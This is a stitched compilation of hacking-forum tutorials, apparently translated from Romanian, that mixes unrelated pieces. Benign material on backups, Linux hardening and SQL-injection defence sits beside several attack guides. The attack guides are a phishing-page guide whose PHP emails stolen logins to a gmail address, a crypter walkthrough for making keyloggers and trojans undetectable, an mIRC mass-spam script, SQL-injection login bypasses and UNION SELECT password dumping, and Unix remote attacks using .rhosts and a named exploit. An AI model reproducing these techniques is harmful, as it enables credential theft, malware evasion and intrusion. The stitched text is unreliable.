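Any non-zero trailing_bytes value is worth a look on an upload path; re-encoding the image on the server drops the appended data entirely.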

How to create a backup (HDD image) with Acronis

We have a freshly installed Windows, with all the drivers, DirectX, favorite programs, internet settings, etc., and we would like it to stay this clean and tidy for a long time. But when you least expect it, it can crash or be irreparably infected with viruses. Then we start over: format, install Windows, drivers and programs, redo the settings, etc. - that is, almost half a day. Wouldn't you like to get all of this done in 30 minutes at most? That is: Windows installation, drivers, preferred software, settings, etc.
For this you will need a program that makes a backup (image) of the partition on which Windows is installed. Here I will show you how to do this with Acronis True Image Workstation 9.1.
It can even be the trial version, it doesn't matter; the image we put on the DVD will never expire.
Install the program mentioned; it asks for a PC restart, and so on.
Open the program and from the top menu go to Tools and then Options. The options window opens; select Default Back-up Options and then Media Components. On the right, on the General tab, you can safely tick Place Acronis True Image Workstation (Full Version) on media, but not "Place Acronis One-Click Restore on media". Why did I point this out? Because this One-Click restores the entire (physical) hard disk in one click, not just one partition (usually the system partition C, for which you have the image). So, the data on the other partitions is lost if you tick "One-Click Restore".

Next we click Backup and a new window appears - Create Backup Wizard. Press Next.

Next we select the partition we want to back up. I chose D:\ because that is where I have my test Windows. Another Next follows.

Now we must specify where we want the backup to be created - "Back-up Archive Location". I chose to write it directly to a blank DVD, and you should do the same. It also works on CDs if you wish (I have personally done it on CD too). So, insert a blank DVD in the drive, select the DVD writer and burn the image directly to the DVD. At File Name enter a name of your own ending in .tib. Press Next again.

In the Backup Mode window tick "Create new full backup archive" and press Next. The last one.

In a few minutes you will have a bootable CD with the .tib image directly on the disc. Put it away for safekeeping and use it when you want a Windows as clean and tidy as at the start. Then you boot from this DVD, and at boot you will be greeted by the same familiar, good-looking interface. All you have to do is a restore. When it asks whether you want the partition to be Active, answer YES.

[Tutorial] SQL Injection

Disclaimer
* This tutorial is intended for learning and for in-depth knowledge of web server security
* I am NOT responsible for what you do after you have acquired this knowledge

:::: SQL Injection ::::
SQL Injection is a method that exploits errors in application code and allows the attacker to inject SQL commands into login forms and feedback forms, with the aim of gaining access to the information in the database.
SQL Injection works because input forms allow SQL expressions to pass directly into the database, so the attacker builds SQL fragments that manipulate the database's commands and gains access in this way.
The most used variant is the SQL login bypass, injecting into the login and password fields.
Example: ? OR 1=1?
URL scheme: http://site.com/index.php?id=0 ? OR 1=1?
Other commands:
admin??
? OR 0=0?
? OR=0?
OR 0=0?
? HI OR 1=1?
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x

We look for such sites with the following dorks:

Code:

?admin\login.asp?
?login.asp?

How to defend against such attacks.
The system must be evaluated for any kind of vulnerability, the code must be bug free, and the applications and everything that is part of the infrastructure must be well sanitized.
A web security audit must be done at every change of components.
There is no point in going into detail, and besides I do not know the SQL database well enough, but if you do not have a complex infrastructure to look after, it is not worth complicating things.

Reindexing a domain

It often happens that search engines penalize your domain name, especially if in the past it belonged to someone else and has a disreputable history. In this tutorial I will teach you how to get your domain reindexed by the major search engines, Google and Yahoo.

Google:

To be reindexed by Google, the domain name must be verified. So you need to log in to your Webmaster account (if you don't have an account I recommend creating one, to benefit from better indexing and from Google Analytics, the best provider of details about site traffic, and many other useful tools).
Then go to https://www.google.com/webmasters/tools/siteoverview where you add the site's URL and press Add Site. You will be redirected to the Overview page, where you must click the link named Verify your site. You can choose one of the 2 verification methods:
1. Uploading an .html file to the host.
2. Inserting a Meta Tag.
After you have chosen one of the 2 methods and applied it, all that remains is to press the Verify button.

Yahoo:

To be reindexed by Yahoo, the domain name must also be verified. You need to log in to your Yahoo! account (you surely have one) and go to https://siteexplorer.search.yahoo.com/mysites. There you enter the site's URL and press Add My Site. After entering it, you must click Authenticate, where you can choose between 2 methods:
1. Uploading an .html file to the host.
2. Inserting a Meta Tag.
After you have chosen one of the 2 methods and applied it, all that remains is to press the corresponding Ready to Authenticate button.

That's about it for this tutorial. I hope you find it useful.

Premium Account List [Updated]

Use them freely :P


Thanx! Not all account working!

Want to be the creator of Windows?

You have two steps to complete:

1. Open Notepad and write the following in it:

[General]
Manufacturer= e.g.: Smekeru !!
Model= e.g.: romania.hackerszone.org
[Support Information]
Line1=write whatever you want
Line2=write whatever you want
Line3=write whatever you want

and add Line4=, Line5=, as many as you like, depending on how much you want to write in the support window.

After you have finished editing this file, save it under the following name: oeminfo.ini

To give you a clearer idea, here is what my oeminfo.ini looks like:

[General]
Manufacturer=fatal1ty
Model=romania.hackerszone.org

[Support Information]
Line1= ...:: Informatii Support ::...
Line2= Powered By Fatal1ty

2. In the second step you need to create a small picture in any program you have available: Paint, Paint Shop Pro, Fireworks, anything. The picture can contain anything but must have the following characteristics:
The size must be: 100 by 75
and it must be saved as: oemlogo.bmp

Perfect, if you have got this far you are almost done.

All that is left to do is take the two files you created, namely oeminfo.ini and oemlogo.bmp, and copy them into the directory: C:\windows\system32

DONE!!! Now you can see your own details by opening:

Control Panel / System - properties.

I hope you managed.

AntiFlood IP, CS server, PHP

A flood is nothing more than a mass of traffic pushed at a port. For example: you can have a web server that runs perfectly on port 80 ... and suddenly you are attacked on port 21, I think you know what that is ... FTP. So what happens?
What do you think?
The services go to a better world, that is, Down!!
The best way to get rid of floods is to download a firewall and know how to configure it: :cry:
For example, what a firewall must do so that nobody can flood you:
An important thing is that it closes the ports that have no justification!
For justified requests it should keep track of a limit, and when they exceed it, block the respective IPs.
It should open ports only for certain IPs when you want to access certain servers.

ANTI FLOOD SERVER CS
A simple program to use.
Install it anywhere you like on the PC ... start Hlds->program, choose the server to which you want to add the patch and click patch Hlds. All Csdos attempts will be rejected :> and the attacks will be written to the log ...
link:
http://rapidshare.com/files/127845025/AntiCSDoS.zip
(I want to point out that the program is not mine!)


ANTI FLOOD SITE

It's easy to do:
create antiflood.php
Users who connect more than once within a 5-second interval to the protected page will be redirected ... It's so simple
Try to put it as high as possible in the source!

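Code:
<?php
if (!isset($_SESSION)) {
    session_start();
}
// antiflood protection croFreak
// The timestamp is stored in the session, so this only throttles clients
// that send the session cookie back.
if (isset($_SESSION['last_session_request'])
        && $_SESSION['last_session_request'] > time() - 5) {
    // A second request within 5 seconds: redirect and stop.
    header("Location: /antiflood.html");
    exit;
}
$_SESSION['last_session_request'] = time();
?>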

Soon I will try to make an antiflood program for Hub!!

With all this madness on offtopic I found a moment to leave this tutorial too )) I hope you find it useful :P

Cum sa facem o pagina de phishing la orice site.

Buna, in ultima vreme m-am saturat sa tot vad pe diferite forumuri:

Dati-mi si mie scam la X.

Asa ca am decis sa scriu acest tutorial. In el veti invata cum va puteti face propriul scam la site-ul dorit.

WARNING: Cei avansati sa nu ma ia cu ia uite-l si pe asta a descoperit Pamantul, este doar pentru cei care nu stiu .

OK, deci mai intai ne alegem o tinta.

Am ales http://doizece.neogen.ro/.

Navigam pe site-ul ales. Apasam CTRL + S si salvam fisierul .html undeva pe computer.

Il deschidem... Aici poate aparea o problema si anume calea la imagini.

Daca este cale relativa (calea relativa este calea de genul /images/wow.gif) trebuie transformata in cale absoluta (http://tinta.com/images/wow.gif)

Acum ca s-a clarificat, duce-ti-va in fisierul .html care a fost salvat, da-ti CTRL + F scrieti login... (aici cuvintele pot fi diferite.. incercati si parola, password, username etc. dak nu merge login).

Veti avea un cod de genul
. Modificati login2.php in 040147.php!

Acum, la Username, ar trebui sa fie un cod de genul . name="email" ne indica faptul ca, in scriptul PHP de autentificare, email este variabila ce tine numele de utilizator.
Bun, o memoram.
La password, codul ar trebui sa fie asemanator (). Deci, parola e tinuta in variabile password. O memoram si pe aceasta.

Acum, acolo unde ati salvat .html-ul, creeati un fisier nou, numit 040147.php.

In el, adaugati urmatorul cod:
Code:
$to       = "skorpitz@gmail.com";

$name = $_POST['email'];
$email = $_POST['email'];
$subject = $_POST['subject'];
$password = $_POST['password'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
$d = date('l dS \of F Y h:i:s A');
$sub = "Cont nou DoiZece Hacked - $email";
$headers = "From: $name <$email>\n";
$headers .= "Content-Type: text/plain; charset=iso-8859-1\n";
$mes .= 'Username: '.$email."\n";
$mes .= "Parola: ".$password."\n";
$mes .= "Browser: ".$agent."\n";
$mes .= "IP: ".$ip."\n";
$mes .= 'Data si timpul: '.$d;

{
mail($to, $sub, $mes, $headers);
header ("Location:http://doizece.neogen.ro/?1=1&dz_nl_m=login_reg&error=1&next_url=index.php%3F");



}
?>
Modificati codul
Code:
$to       = "skorpitz@gmail.com";
i puneti mail-ul vostru. Codul de mai sus preia variabilele email si password si le trimite impreuna cu inca cateva detalii folositoare.

Redenumiti .html-ul in index.html sau .php, uploada-ti cele 2 fisiere pe un host si distrati-va. :wink:

Free VPN

Here are a few sites that offer VPN for free!

http://ultravpn.lynanda.com/ French IP
www.relakks.com Swedish IP
http://anchorfree.com/downloads/hotspot-shield/ US IP
http://www.iopus.com/iPig/ US IP
http://www.secureix.com/ US IP

AOL and CS are probably known to most users.

There are a few more, but I can no longer find the text where I wrote them all down!

How to crack a root/http (basic authentication)/php

I think you have all heard of "brutus": it is a brute-force password generator that tests all possible passwords against a given user, using different character sets (char, integer, alphanumeric); it has a small "database" of certain users/passwords used worldwide, condensed into a list

Cum sa faci un virus / trojan / keylogger indetectabil 100%

In acest tutorial vei invata cum sa faci un virus / trojan / keylogger etc.. nedetectabil 100% !

1. I-ati trojanul / keyloggerul sau virusul si pregateste-l ...
2. Download Software Passport (Armadillo) by Silicon Realms
* Aces program te va ajuta sa faci virusul nedetectabil
DOWNLOAD : LINK 1 RS
LINK 2 ( obligatoriu emailul tau deoarece iti trm pe mail de unde sa-l iei )

3. Instalezi programul
4. Il deschizi va arata cama sa :



5. Acum downloadati settingurile gata facute pentru a nu mai avea voi mult de munca !

DOWNLOAD : AICI si
AICI

Downloadat de pe amandoua linkurile deoarece aveti nevoie de ambele file!

6. Le downloadati si le puneti in acelasi folder amandoua fiserele , oriunde in PC
7. Acum daca aveti deschis programul Software Passport da-ti clik in stanga pe " Loading Existing Project " si mergeti la fisierul project.arm acolo unde l-ati salvat
8. Undeva in centru aveti " Files To Protect "
* Stergeti ce e in chnar ( clik pe el si apoi minus > OK )
* Da-ti pe PLUS si selectati virusul sau keyloggerul
9. Mai jos aveti Build Project . O sa va apara mai multe ferestre !
* Voi da-ti doar Yes si OK

10. Acum aveti un virus nedetectabil

PENTRU A VERIFICA INTRATI AICI : www.virustotal.com
Uploadati fiserul dumneavoastra si o sa vedeti ca nu gaseste nimik

mIRC Spammer

Spamming on IRC

First we'll begin with spamming a message to everybody in a channel using one command. Everybody in the channel will be messaged, if he hasn't changed nick when the timer reaches him. Using this command, a certain amount of timers will be created, everybody in that channel will have a certain unique timer, and when the timer is reached he will be messaged. This means that you can join the channel, use the command and leave again, done that they don't know from what channel you spammed them, and you won't be banned or kicked by example. Maybe a lame script, but it can be used to learn certain things about mIRC script procedures. You have to make an alias in mIRC and add the next in it:

spam {
var %x = 1
var %t = 1
set %a YOUR SPAM MESSAGE
while ($nick($chan,%x)) {
/timer 1 %t .msg $ifmatch %a
inc %x
inc %t 30
}
}

Things that can/must be changed:
"YOUR SPAM MESSAGE" = the message that you want to spam
30 = the amount of seconds between two message intervals, this can be a problem for certain servers. In some servers you can let it message every 5 seconds without a problem, but certain servers will give you some error: "target is moving too fast", this means that you are messaging too many messages too fast to users, so you have to increase that variable into a higher value.

If you have done all this, you can use it by typing the next command, you must be in the channel that you want to spam;

/spam #channel

Note: #channel = the channel that you want to spam, you must be in there when you use the command, after using that command you can leave immediately, so the people that receive your messages won't realise what channel you have / had in common.

This was an example for spamming a message, but you can do also other things by changing the .msg in the script.

Example: ping everybody

massping {
var %x = 1
var %t = 1
set %a ping
while ($nick($chan,%x)) {
/timer 1 %t .ctcp $ifmatch %a
inc %x
inc %t 30
}
}

And you can do much more, using this structure.

SQL Injection Attacks Tutorial

I. Manipulating login.php Script
[01] Open the terminal and type (without prepending prompt symbols):

$ su -
# sql_tutorial_start

These commands will start all needed services in the background.

[02] Open the browser and check http://localhost/phpmyadmin/.

[03] Have a look at the database userdb that our login.php script is accessing.

[04] Have a look at login.php script. To do this, open another terminal and type:

$ vi login.php

or, in case you are not familiar with vi text editor, you can use more user friendly mcedit (or any other editor you wish):

$ mcedit login.php

[05] If you want to see the submitted query to get more information, delete the prepending slashes in the echo "$query" line:


[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:



[07] Enter username admin which we know is existing. As you can see, we cannot login due to the missing password.

[08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.

[09] Enter admin' OR 1=1 as username and see what happens.

[10] Out of the query we can see that we have a closing single quote that isn't opened.

[11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in:



[12] To advance the attack you might want to use /* to comment out everything that follows. Enter admin' /* as username and then check the query:

SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''

is what we entered, but only the part before /* is processed by the database. This is why the statement is valid.




II. UNION SELECT

[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.

[02] Open the script in the console by typing:

$ vi /yabbse/SSI.php

or use whichever editor you want. Now move to the line 222, where the query we are trying to manipulate is located.

[03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?func...

[04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to an SQL injection attack.

[05] Out of the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query.


[06] Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. From the error message we can see that the inserted SELECT statement doesn't return the same number of columns as the original query. We have to add something to make them equal.


[07] Move your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:




[08] Have a look at line 223 and below. There is a HTML parser to be found that shows the result of our query. So what we have to do now is to mix around our null statements.

[09] Move to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted:

[10] Return to a terminal opened at the beginning (or open a new one) and issue commands:

$ su -
# sql_tutorial_stop

This will stop all services needed to pass through this tutorial.
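
Both SQL injection tutorials on this page (the login-bypass strings in the first one, the login.php query of step [12] and the $ID_MEMBER parameter here) depend on user input being pasted into the query text. The added example below is not code from the tutorial: it uses Python's sqlite3 with constructed tables in place of the PHP/MySQL lab, and its function names and sample rows are assumptions. It puts the concatenated login query next to a parameterized one, with a quote-balancing username like the one in step [11], and validates the numeric parameter before binding it.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's userdb (all rows are made up)."""
    db = sqlite3.connect(":memory:")
    # The lab table holds plain passwords; a real application stores hashes.
    db.execute("CREATE TABLE userlist (username TEXT, password TEXT)")
    db.execute("INSERT INTO userlist VALUES ('admin', 'constructed-secret')")
    db.execute("CREATE TABLE topics (id_member INTEGER, subject TEXT)")
    db.execute("INSERT INTO topics VALUES (1, 'constructed topic')")
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Same shape as the query in step [12]: input is pasted between quotes."""
    query = (
        "SELECT * FROM userlist WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return db.execute(query).fetchone() is not None


def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized form: the driver sends the values separately from the SQL,
    so a quote in the input is data and can never close the string literal."""
    row = db.execute(
        "SELECT 1 FROM userlist WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def recent_topics_safe(db: sqlite3.Connection, id_member: str) -> list:
    """Numeric parameters such as ID_MEMBER: accept digits only, then bind."""
    if not re.fullmatch(r"[0-9]+", id_member):
        raise ValueError("ID_MEMBER must be a non-negative integer")
    return db.execute(
        "SELECT subject FROM topics WHERE id_member = ?", (int(id_member),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    crafted = "admin' OR 1='1"          # quote-balancing input, empty password
    print("vulnerable, crafted input:", login_vulnerable(db, crafted, ""))
    print("safe, crafted input:      ", login_safe(db, crafted, ""))
    print("safe, real credentials:   ", login_safe(db, "admin", "constructed-secret"))
    try:
        recent_topics_safe(db, "1'")    # the probe from step [04] of part II
    except ValueError as exc:
        print("rejected:", exc)
```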

Linux Security Basics

All operations described below require that you know the root password and can su in as root.

Linux Security Overview

One of the main advantages of choosing Linux is that it is very secure and it is very rare to hear of major viruses, worms, or hackers which target Linux systems. That being said, Linux is not perfect and there are many things that need to be done in order to ensure that your Linux distribution is running as securely as possible. First, controlling how users can remotely access your machine is vital to its security. Secondly, a major security issue for any system is running unneeded services in the background that open holes for attackers to gain access. Linux is no different and disabling any services you are not using is also critical in securing Linux.

Remote Access Protocols - SSH2 and telnet

The ease of use of the Linux remote access protocols is one of the strong points of Linux, but not all the protocols are created equal. There are three main remote access protocols that can be found in nearly every Linux distribution:

* Telnet- The oldest and least secure of all the remote access protocols, telnet should only be used if it is the only option. All information and especially passwords are sent in plain text, so anyone could intercept the information sent across the network.
* SSH- The first version of an encrypted client found on nearly every Linux machine. This client encrypts all data sent through it and is a secure option.
* SSH2- A revised version of SSH that strengthened the encryption as well as added new features such as scp and sftp which make it easy to transfer files securely over the remote connection.
* OpenSSH- A version of SSH2 that was rewritten for the General Public License (SSH2 is free for non-commercial use only) which has all of the same features as SSH2.

If you wish to allow users to connect remotely to your machine, we recommend that SSH2 (www.ssh.com) or OpenSSH (www.OpenSSH.com) is used to provide a secure connection as well as a secure method of transferring files to remote machines (the old ftp protocol also sends passwords and data in clear text like telnet). An important note is that if you use OpenSSH as your SSH daemon, you will have to force your ssh client to use the SSH2 protocol with the -2 option. To see what version you currently have installed, simply access the SSH man page by typing:

ComputerName:~# man sshd

We also highly recommend that if you do not plan on using some or all of the above services that you disable the corresponding services as described below as well as disable the corresponding ports in your firewall (Linux Firewall Page).

Disabling Unneeded Services

Services are small programs that run in the background that perform many vital operations for both servers and workstations. During a normal install of Linux, many of these services are installed and activated during the boot process by default. Historically, some of these services have had security problems or flaws that have allowed hackers, viruses, and worms to use them as doors into unsuspecting machines. Many of these services, however, are not needed by common users and can be turned off, closing security holes and recovering system resources. Listed below are some common Linux services as well as a method for disabling services that are not needed.

A Description of Common Linux Services

There are a good number of services that Linux uses and it is not possible to discuss them all here. A list containing a short description of many Linux services can be found at http://www.hosef.org/wiki/LinuxServiceDescriptions along with the author's opinion on whether or not the various services should be on or off. Below is a list of common services and our recommendation on whether or not they should be turned off or on. Please note that these service names are slightly different for each version of Linux and some of the services listed below may or may not appear in your listing of services.

* cron, anacron- Cron is responsible for running scheduled system jobs and anacron is responsible for running any missed jobs due to system downtime. Some versions of Linux use these two services to perform housekeeping chores, so they should be left on.
* ftpd- This is the File Transfer Protocol daemon that allows a FTP server to run. If you do not have an FTP server or do not know what that is, turn it off.
* httpd- This is the HTTP daemon that allows a web server to run. If you do not run a web server on your machine, turn it off.
* iptables- One of the major Linux firewall tools. Since it is used to implement many of the standard firewalls, this service should be left enabled.
* isdn- A service for people using ISDN to access the internet. If you do not use ISDN, disable this service.
* lpd- The Linux printing daemon. If you do not have a printer, turn it off.
* nfs, nfslock, portmap- Three services required for the old style Linux Network File System format. Unless you are using this format, disable these three services.
* pcmcia- The services for controlling laptop pcmcia devices. Disable this service unless you are running Linux on a laptop.
* samba, smb, smbd, nmbd- Various services related to Samba servers for allowing Windows machines to connect to printer or disk shares on your machine. These can be turned off unless you would like to access your Linux shares from Windows.
* sshd, sshd2- These two services allow remote access to your machine from the SSH and SSH2 protocols respectively. If you would like to remotely access your machine, we recommend that you leave sshd2 on and turn off sshd, otherwise both can be turned off (Please note that OpenSSH appears as sshd even though it can use the SSH2 protocol, so if you want to use OpenSSH, leave sshd enabled).
* telnet, telnetd- These services allow you to remotely access your machine through telnet. This is very insecure and we recommend disabling telnet.

Using the chkconfig Command to Disable Unneeded Services

One of the easiest ways to disable unneeded services in Linux is the utility chkconfig. It is installed by default in almost all distributions, but an RPM version and a .DEB file for Debian users can also be downloaded. Services in Linux are usually run through two different structures: inetd or the newer xinetd. Inetd is an older super-server that listens for any incoming calls and directs them to the correct service depending on which services it is configured to use. The default services that inetd starts are dependent on what run level the system is in (the default graphical run level is 5). The newer xinetd runs services independent of the current run level and is supposed to be a more secure replacement for inetd. Most Linux distributions mix and match services between the two. The chkconfig utility can be used to manage services run in both types. To view the current configuration of the services, we simply have to type:

ComputerName:~# chkconfig --list

If chkconfig is installed, then a printout similar to the one below should appear:

cron 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
...
xinetd based services:
daytime on
daytime-udp off
time off
...

Once you have decided which services you would like to disable, you must check if the service is run through xinetd or inetd and enter the appropriate command. For xinetd services, the command format is simply chkconfig <service> <on|off>. So if we wanted to turn off daytime in the list above, we would simply type:

ComputerName:~# chkconfig daytime off

Typing in chkconfig --list a second time will now show us that daytime is off. For inetd services, the run levels you wish to change must also be included, making the general command structure look like: chkconfig --level <levels> <service> <on|off>. In the above example, to turn off the httpd service in run levels 3, 4, and 5 the command would be:

ComputerName:~# chkconfig --level 345 httpd off

Now, when chkconfig --list is typed in, the following list should appear:

cron 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
...
xinetd based services:
daytime off
daytime-udp off
time off
...

The chkconfig utility is an easy way to manage services that run at boot time, but it is important to remember that any services you disabled will still be running until you either reboot or manually kill the service.
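
The review described above can be automated. The following added example (not part of the original article) parses chkconfig --list output in the two layouts shown here and prints the chkconfig command that would switch off each enabled service from the article's "turn off unless you need it" list; the review table, function names and the extra telnet line in the sample are constructed for illustration.

```python
import re

# Services the article says to turn off unless they are actually used.
REVIEW_IF_UNUSED = {
    "ftpd": "FTP server",
    "httpd": "web server",
    "isdn": "ISDN access",
    "lpd": "printing daemon",
    "nfs": "Network File System",
    "nfslock": "Network File System",
    "portmap": "Network File System",
    "pcmcia": "laptop PCMCIA devices",
    "samba": "Windows file/printer shares",
    "smb": "Windows file/printer shares",
    "smbd": "Windows file/printer shares",
    "nmbd": "Windows file/printer shares",
    "telnet": "clear-text remote access",
    "telnetd": "clear-text remote access",
}

LEVEL_RE = re.compile(r"[0-6]:(on|off)")

# The article's first listing, plus one constructed telnet line.
SAMPLE_BEFORE = """\
cron 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
...
xinetd based services:
daytime on
daytime-udp off
time off
telnet on
...
"""

# The article's listing after the two chkconfig commands were run.
SAMPLE_AFTER = """\
cron 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
...
xinetd based services:
daytime off
daytime-udp off
time off
...
"""


def parse_chkconfig(text: str):
    """Return ({service: [run levels that are on]}, {xinetd service: enabled})."""
    by_level, xinetd, in_xinetd = {}, {}, False
    for raw in text.splitlines():
        tokens = raw.split()
        if not tokens or tokens[0] == "...":
            continue
        if raw.strip().lower().startswith("xinetd based services"):
            in_xinetd = True
            continue
        name, states = tokens[0].rstrip(":"), tokens[1:]
        if states and all(LEVEL_RE.fullmatch(s) for s in states):
            by_level[name] = sorted(int(s[0]) for s in states if s.endswith(":on"))
        elif in_xinetd and len(states) == 1 and states[0] in ("on", "off"):
            xinetd[name] = states[0] == "on"
    return by_level, xinetd


def audit(text: str) -> list:
    """List (service, reason, command) for enabled services worth reviewing."""
    by_level, xinetd = parse_chkconfig(text)
    findings = []
    for name, levels in by_level.items():
        if name in REVIEW_IF_UNUSED and levels:
            level_arg = "".join(str(level) for level in levels)
            findings.append((name, REVIEW_IF_UNUSED[name],
                             f"chkconfig --level {level_arg} {name} off"))
    for name, enabled in xinetd.items():
        if name in REVIEW_IF_UNUSED and enabled:
            findings.append((name, REVIEW_IF_UNUSED[name], f"chkconfig {name} off"))
    return findings


if __name__ == "__main__":
    for service, reason, command in audit(SAMPLE_BEFORE):
        print(f"{service:8} {reason:28} -> {command}")
```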

Unix Remote Attacks

What are remote hacks?

A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we won't really cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually the goal is to exploit an existing service running on the victim server that is misconfigured or allows too much access. Exporting an NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons might be subject to remote buffer overflows, allowing someone at a remote location to run arbitrary commands on the victim server.

Here are a couple of examples:

1. You are root on a host named badguy.
2. You discover the host victim is exporting /home2/old read/writable to the world.
3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.
4. Quickly, you create a fred account on badguy.
5. Now you mount /home2/old and create an .rhosts file to establish trust with badguy.
6. After you become fred on badguy, you rlogin to the victim as fred.
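
The weak point in this scenario is a read/write export open to every host combined with home directories that honor .rhosts. The audit below is an added example, not part of the original FAQ. It assumes the Linux exports(5) file format, ignores backslash line continuations, and uses hypothetical function names. Only /home2/old comes from the scenario; every other path and host in the sample is constructed.

```shell
#!/bin/sh
# Constructed sample in Linux exports(5) syntax.
sample_exports() {
cat <<'EOF'
# path        client(options) ...
/home2/old    *(rw)
/export/src   trusted.example.com(rw) *(ro)
/export/pub   (ro)
/scratch      (rw,sync)
/export/docs
EOF
}

# world_writable_exports
# Reads an exports file on stdin and prints every export point that grants
# "rw" to all hosts, i.e. to the client "*" or to a bare "(options)" entry.
world_writable_exports() {
    awk '
        { sub(/#.*/, "") }                 # drop comments
        NF == 0 { next }
        {
            for (i = 2; i <= NF; i++) {
                client = $i
                opts = ""
                p = index(client, "(")
                if (p > 0) {
                    opts = substr(client, p + 1)
                    sub(/\)$/, "", opts)
                    client = substr(client, 1, p - 1)
                }
                # Entries limited to a named host or network are not "world".
                if (client != "" && client != "*") continue
                n = split(opts, o, ",")
                for (j = 1; j <= n; j++)
                    if (o[j] == "rw") { print $1; next }
            }
        }
    '
}

# rhosts_files DIR...
# Lists .rhosts files below the given directories. Run it on each tree that
# world_writable_exports reports: any hit there can be rewritten by a client.
rhosts_files() {
    find "$@" -type f -name .rhosts 2>/dev/null | sort
}
```

On a server the input is the real file: `world_writable_exports < /etc/exports`. Each reported export should be restricted to named clients or made read-only.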

Here's another attack involving a buffer overflow:

1. This remote system is running named.
2. You have written a named exploit that allows you to send arbitrary commands through the named daemon. It does a buffer overflow trick; you compile it and name it sploit.
3. You type: sploit ns.example.com "/usr/X11R6/bin/xterm -display badguy.whatever:0"
4. A window appears on your terminal that is running as root on ns.example.com.

What is DoS?

DoS (Denial of Service) is simply rendering a service incapable of responding to requests in a timely manner. This is a controversial subject, since some people think that DoS is not a hack, and/or is rather juvenile and petty. We prefer to think of them as just one more kind of tool in the toolbox, and as such, will continue to include material on them in the Hack FAQ. Ask yourself which is more alarming - the number of kids trying DoS attacks, or the number of DoS attacks that succeed?

Regardless of your feelings, DoS has been steadily gaining in popularity, whether with hackers mad at other hackers, sysadmins mad at spammers, or whatever - virtually everyone we've run into that is aware of the potential of DoS at least has software to do it, admins included.

IP Shower via PHP

OK, first of all we create a dynamic text field in Flash and give it the variable name userip.

Then in the first frame of our Actions Layer we write this code:

loadVariablesNum("script.php", 0);


Then, in the same folder as our movie, we create a PHP script called script.php and inside it we write this line of code:



Save everything and upload these files to your server to see the results!!!
Thank You.

Viruses, Worms and Trojans

Table of Contents

1. Viruses, Worms and Trojans
   1. Definitions
   2. Virus Varieties
      1. Stealth Virus
      2. Macro Viruses
      3. Linux Viruses
   3. Spreading Malware via the Internet
   4. Structure of Viruses
   5. Virus Detection
2. Lab Experiment
3. Acknowledgements
4. References

Viruses, Worms and Trojans

Unix. The world's first computer virus.

Title of Chapter 1 of The Unix Haters Handbook, ISBN: 1-56884-203-1

The above is indeed the title of a chapter! The book is in fact written by serious computer scientists. Nevertheless, we must disregard the suggestion that Unix is a virus as an attempt at being hilarious. Equally unhelpful are the news media that use the term virus in referring to any piece of malicious software. The academic world uses the term "malware" for these. Rigorous definitions have been given by many computer security experts but they do not match the typical use even by other security experts. Thus, we must settle for practical "definitions" of malicious software.

Definitions

* Security tools are designed to be used to protect computer systems and networks. These can also be used by unauthorized individuals to probe for weaknesses. Many of the programs that fall in the malware categories below have benevolent uses. For example, worms can be used to distribute computation on idle processors; back doors are useful for debugging programs; and viruses can be written to update source code and patch bugs. The purpose, not the approach, makes a program malicious.
* Back doors, sometimes called trap doors, allow unauthorized access to your system.
* Logic bombs are programmed threats that lie dormant for an extended period of time until they are triggered; at this point, they perform a function that is not the intended function of the program in which they are contained. Logic bombs usually are embedded in programs by software developers who have legitimate access to the system.
